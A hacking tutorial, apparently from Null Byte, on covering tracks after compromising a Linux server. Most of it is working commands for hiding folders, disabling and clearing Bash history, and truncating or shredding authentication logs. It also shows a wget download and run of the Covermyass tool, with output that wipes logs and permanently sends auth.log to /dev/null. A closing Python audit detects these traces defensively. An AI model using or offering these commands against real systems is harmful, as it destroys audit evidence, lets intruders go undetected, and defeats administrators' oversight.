How to clear logs and history on Linux systems to cover your tracks and go unnoticed «Null Byte :: WonderHowTo



The final stage of exploitation is covering your tracks: clearing all activity and logs so that the attacker avoids detection. It is especially crucial for persistence if the target is to be approached again in the future.

To show you the basics of covering your tracks, we'll first compromise a target and then explore some techniques used to remove Bash history, clear logs and remain hidden after exploiting a Linux system.

Step 1: Compromising a Target

The first thing to do is exploit the target. We can use command injection to take advantage of the way the server processes OS commands to get a shell.

We will also want to upgrade our new shell to a fully interactive shell. Doing so makes it easier to work in general and we can also use tab completion and terminal history.

Then we can escalate our privileges so that we can take better advantage of the system to go unnoticed.

Step 2: Create an easy-to-delete hidden folder

Once we have root access, we can create a hidden folder to work out of and store scripts or files in. A hidden folder will be spotted by everyone except the most novice admin, but another layer of discretion certainly wouldn't hurt. First, let's locate all world-writable directories with the following command:

  root@target:/# find / -perm -222 -type d 2>/dev/null

/dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/twiki/data/Sandbox
/var/www/twiki/data/Main
/var/www/twiki/data/Know
/var/www/twiki/data/TWiki
/var/www/twiki/data/_default
/var/www/twiki/data/Trash
/var/www/twiki/pub/Sandbox
/var/www/twiki/pub/Main
/var/www/twiki/pub/Know
/var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
/var/www/twiki/pub/TWiki
/var/www/twiki/pub/TWiki/TWikiDocGraphics
/var/www/twiki/pub/TWiki/TWikiTemplates
/var/www/twiki/pub/TWiki/TWikiLogos
/var/www/twiki/pub/TWiki/PreviewBackground
/var/www/twiki/pub/TWiki/FileAttachment
/var/www/twiki/pub/TWiki/WabiSabi
/var/www/twiki/pub/Trash
/var/www/twiki/pub/icn
/tmp
/tmp/.ICE-unix

We can create a hidden directory with the mkdir command and prefix the name with a dot:

  root@target:/# mkdir /dev/shm/.secret

When we list the contents of /dev/shm, nothing appears:

  root@target:/# ls -l /dev/shm/

total 0

Only when we use the -a switch to display all files and folders does it show up:

  root@target:/# ls -la /dev/shm/

total 0
drwxrwxrwt  3 root root    60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x  2 root root    40 2019-06-19 13:49 .secret

And to delete the directory once we're done on the machine, use the rmdir command:

  root@target:/# rmdir /dev/shm/.secret/

Step 3: Delete the Bash History

Bash keeps a list of the commands used in the current session in memory, so it is important to clear it to hide your tracks. We can view the current history with the history command:

  root@target:/# history

1 cd /
2 ls
3 find / -perm -222 -type d 2>/dev/null
4 cd /dev/shm/
5 cd /
6 mkdir /dev/shm/.secret
7 ls -l /dev/shm/
8 ls -la /dev/shm/
9 ls
10 rmdir /dev/shm/.secret/
11 history

Commands are written to the file named by the HISTFILE environment variable, which is usually .bash_history. We can echo the variable to see the location:

  root@target:/# echo $HISTFILE

We can use the unset command to remove the variable:

  root@target:/# unset HISTFILE

So if we echo it again, nothing appears:

  root@target:/# echo $HISTFILE

We can also make sure that the command history is not saved by sending it to /dev/null. Set the variable to that path:

  root@target:/# HISTFILE=/dev/null

Or do the same with the export command:

  root@target:/# export HISTFILE=/dev/null

And the history is now being sent to /dev/null (nowhere):

  root@target:/# echo $HISTFILE

/dev/null

We can set the number of commands remembered during the current session to 0 using the HISTSIZE variable:

  root@target:/# HISTSIZE=0

You can also use the export command:

  root@target:/# export HISTSIZE=0

We can also change the number of lines allowed in the history file with the HISTFILESIZE variable. Set this to 0:

  root@target:/# HISTFILESIZE=0

Or with export:

  root@target:/# export HISTFILESIZE=0

The set command can also be used to change shell options. Use the following command to disable the history option:

  root@target:/# set +o history

And to enable it again:

  root@target:/# set -o history

Likewise, the shopt command can be used to change shell options. Use the following command to disable history:

  root@target:/# shopt -ou history

And to enable it again:

  root@target:/# shopt -os history

While running commands on the target system, we can sometimes avoid saving them in history by starting the command with a leading space:

  root@target:~#  cat /etc/passwd

That technique does not always work and depends on the system: Bash only ignores such commands when HISTCONTROL contains ignorespace or ignoreboth.

We can also just clear the history with the -c switch:

  root@target:~# history -c

To write the change to disk, use the -w switch:

  root@target:~# history -w

That will only clear history for the current session. To be absolutely sure that history is cleared when you close a session, the following command is useful:

  root@target:/# cat /dev/null > ~/.bash_history && history -c && exit

We can also use the kill command to close the session without saving history:

  root@target:/# kill -9 $$

Step 4: Clear the Log Files

In addition to Bash history, log files must also be cleared to go unnoticed. Here are some common log files and what they contain:

  • /var/log/auth.log  Authentication
  • /var/log/cron.log  Cron jobs
  • /var/log/maillog   Mail
  • /var/log/httpd     Apache

Of course we can simply delete a log with the rm command:

  root@target:/# rm /var/log/auth.log

But a missing log file will likely raise red flags, so it's better to empty the file rather than delete it completely. We can use the truncate command to reduce its size to 0:

  root@target:/# truncate -s 0 /var/log/auth.log

Note that truncate is not present on all systems.

We can achieve the same by echoing nothing into the file:

  root@target:/# echo '' > /var/log/auth.log

And also with > alone to empty the file:

  root@target:/# > /var/log/auth.log

We can also send /dev/null to it:

  root@target:/# cat /dev/null > /var/log/auth.log

Or use the tee command:

  root@target:/# true | tee /var/log/auth.log

We can also use the dd command to write nothing to the log file:

  root@target:/# dd if=/dev/null of=/var/log/auth.log

0+0 records in
0+0 records out
0 bytes (0 B) copied, 6.1494e-05 s, 0.0 kB/s

The shred command can be used to overwrite a file with meaningless binary data:

  root@target:/# shred /var/log/auth.log

We can even tack on -zu, which adds a final pass of zeros and then truncates and removes the file, to hide the evidence of shredding:

  root@target:/# shred -zu /var/log/auth.log

Step 5: Use a Tool to Get Things Erased

To increase the chances of any activity on the target going undiscovered, we can use a tool to make sure everything is erased. Covermyass is a script that automates many of the processes we've already covered, including clearing log files and disabling Bash history.

We can get the script from GitHub with wget (assuming we can access the internet on the target, otherwise it must be manually transferred):

  root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

Go to a writable folder and use chmod to make it executable:

  root@target:/tmp# chmod +x covermyass

Then we can run it:

  root@target:/tmp# ./covermyass

Welcome to Cover my ass tool!

Choose an option :

1) Clear logs for the user's root
2) Permanently disable the authentication and bash history
3) Restore settings to default
99) Closing tool

> 

We get a custom prompt with a few options to choose from. Let's select the first one to clear the logs:

> 1

[+] /var/log/messages cleaned up.
[+] /var/log/auth.log cleaned.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned up.
[+] History file deleted.

Reminder: You have to reload the session to see effects.
Type exit to do this.

We can also disable Bash and Auth history with option 2:

> 2

[+] Permanently send /var/log/auth.log to /dev/null
[+] Permanently send bash_history to /dev/null
[+] Set HISTFILESIZE & HISTSIZE to 0
[+] Library for disabled history

Bash log disabled permanently. 

And in case you need to erase everything quickly, append now to the command:

  root@target:/tmp# ./covermyass now

[+] /var/log/messages cleaned up.
[+] /var/log/kern.log cleaned.
[+] /var/log/wtmp cleaned.
[+] ~/.bash_history cleaned up.
[+] History file deleted.

Reminder: You have to reload the session to see effects.
Type exit to do this.

Wrapping Up

Today we explored different techniques used to cover tracks and go unnoticed on a compromised machine. We discussed ways to disable and delete Bash history, methods to clear log files, and used the Covermyass tool to make sure our activity on the target was wiped. There are other ways to clear certain traces of an attack, such as with Metasploit, with shell scripting or on a compromised Windows machine, but the above should be all you need for a standard Linux machine.
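From the defender's side, the settings and emptied logs walked through in Steps 3 and 4 (and automated by Covermyass in Step 5) are themselves detectable. The following Python audit is an added example, not code from the article or from the Covermyass project: it checks a shell profile for the history-disabling settings, flags logs that have been emptied, and lists unexpected hidden entries in the world-writable directories the article uses, all against constructed sample inputs.

```python
import re

# Shell settings walked through in Step 3 that disable or divert history.
# A legitimate profile rarely contains any of these, so every hit deserves a look.
HISTORY_TAMPER = [re.compile(p) for p in (
    r"^\s*unset\s+HISTFILE\b",
    r"^\s*(?:export\s+)?HISTFILE=/dev/null\b",
    r"^\s*(?:export\s+)?HISTSIZE=0\b",
    r"^\s*(?:export\s+)?HISTFILESIZE=0\b",
    r"^\s*set\s+\+o\s+history\b",
    r"^\s*shopt\s+-ou\s+history\b",
)]

# Logs from Step 4 that are never legitimately empty on a running server.
EXPECTED_NONEMPTY = ("/var/log/auth.log", "/var/log/wtmp", "/var/log/messages")

# Hidden entries that belong in /tmp on a normal system (the article's listing shows .ICE-unix).
BENIGN_HIDDEN = {".", "..", ".ICE-unix", ".X11-unix"}


def audit_profile(text):
    """Return (line_no, line) for every history-tampering line in a shell profile."""
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if any(p.search(line) for p in HISTORY_TAMPER)]


def audit_log_sizes(sizes):
    """sizes maps log path -> byte size; return the logs that have been emptied."""
    return [path for path in EXPECTED_NONEMPTY if sizes.get(path) == 0]


def audit_hidden_dirs(listing):
    """listing maps a world-writable dir -> its entries; return unexpected hidden ones."""
    return [f"{d}/{e}" for d, entries in listing.items()
            for e in entries if e.startswith(".") and e not in BENIGN_HIDDEN]


# Constructed sample inputs (not taken from a real host).
SAMPLE_PROFILE = """\
# constructed ~/.bashrc
export PATH=$PATH:/usr/local/bin
export HISTFILE=/dev/null
HISTSIZE=0
set +o history
"""
SAMPLE_SIZES = {"/var/log/auth.log": 0, "/var/log/wtmp": 46080, "/var/log/messages": 0}
SAMPLE_LISTING = {"/dev/shm": [".", "..", ".secret"], "/tmp": [".", "..", ".ICE-unix", "build"]}
```

On a live host, feed audit_profile the contents of /etc/profile, /etc/bash.bashrc and each user's ~/.bashrc and ~/.bash_profile, and audit_log_sizes the sizes from os.stat; a recently modified but zero-byte auth.log is the signature of the truncate, dd and tee variants above.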


Cover Image by Vojtech Okenka / Pexels
